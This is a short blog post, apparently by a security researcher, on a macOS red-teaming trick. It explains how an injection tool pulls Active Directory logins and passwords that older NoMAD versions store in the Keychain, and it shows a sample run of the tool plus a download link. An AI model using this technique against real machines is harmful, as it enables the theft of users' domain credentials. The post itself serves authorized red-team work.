macOS Red Teaming Tricks series

This is the first post of the new #macOSRedTeamingTricks series. The idea is to share simple & ready-to-use tricks that may help you during macOS red teaming engagements.

The trick

This post shows how to get AD data, including a user’s login and password from a macOS machine with configured NoMAD. NoMAD helps Mac users bound with AD domains, and from my experience, it is widely used software, particularly in legacy Windows environments. It allows generating Kerberos tickets in a smooth and transparent for the user way. A commonly used NoMAD feature is to save a user’s login and password in the Keychain. Who wants to pass the login and password every reboot? :-)

img

The trick is to abuse macOS Keychain that still has an architectonical issue… It doesn’t check versions of the applications that request the Keychain entries. You can read more about it here. The tool provided below injects to an older version of NoMAD (without Hardened Runtime turned on) and gets the AD credentials.

$ ./NoMADCredentialsStealer.app/Contents/MacOS/NoMADCredentialsStealer
$
+-------------------------------+
+   NoMAD Credentials Stealer   +
+  by Wojciech Regula (_r3ggi)  +
+-------------------------------+
+> Domain -> wojciechregula.blog
+> Domain controller -> controller.wojciechregula.blog
+> Kerberos realm -> WOJCIECHREGULA.BLOG
+> AD login -> [email protected]
+> AD password -> Passw0rd

Download

https://github.com/r3ggi/NoMADCredentialsStealer/